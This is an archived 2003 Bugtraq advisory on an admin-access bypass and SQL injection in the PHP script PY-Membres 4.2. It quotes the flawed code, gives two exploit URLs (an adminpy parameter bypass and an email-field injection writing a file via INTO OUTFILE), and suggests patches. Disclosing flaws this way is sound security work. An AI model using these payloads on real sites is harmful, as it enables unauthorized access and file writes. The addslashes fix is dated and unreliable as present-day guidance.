lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 26 Aug 2003 17:03:33 +0200
From: "Frog Man" <leseulfrog@...mail.com>
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org
Subject: [PHP] PY-Membres 4.2 : Admin Access, SQL Injection


Informations :
°°°°°°°°°°°°°
Language : PHP
Version : 4.0, 4.1, 4.2 (and less ?)
Website : http://www.scripts-php.com
Problems :
- Admin Access
- SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin/secure.php :

----------------------------------------------
<?
if (!isset($adminpy) && $adminpy !== "$admin")
{
Header("Location: index.php");
exit;
}
?>
----------------------------------------------

pass_done.php :

-----------------------------------------------------------------------------------------------------------------------------
[...]
if($Submit)
{
connexiondb();
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE 
email='$email'");
list($login, $passwd) = mysql_fetch_row($query);
$nb=mysql_num_rows($query);
if($nb<1)
{ echo"<script language=\"Javascript\">alert('Aucun membre ne correspond à 
votre e-mail !');window.location='pass_done.php';</script>";
exit;}
[...]
-----------------------------------------------------------------------------------------------------------------------------


Exploits :
°°°°°°°°

http://[target]/admin/admin.php?adminpy=1

http://[target]/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt


Patch :
°°°°°°°
A patch and more details can be found on http://www.phpsecure.info.

In admin/secure.php, just replace the line :
----------------------------------------------
if (!isset($adminpy) && $adminpy !== "$admin")
----------------------------------------------
by :
----------------------------------------------
if (!isset($adminpy) || $adminpy !== "$admin")
----------------------------------------------


And in pass_done.php, add the line :
----------------------------
$email = addslashes($email);
----------------------------

just before :

---------------------------------------------------------------------------------
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE 
email='$email'");
---------------------------------------------------------------------------------





frog-m@n

_________________________________________________________________
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/hotmailparsms

Powered by blists - more mailing lists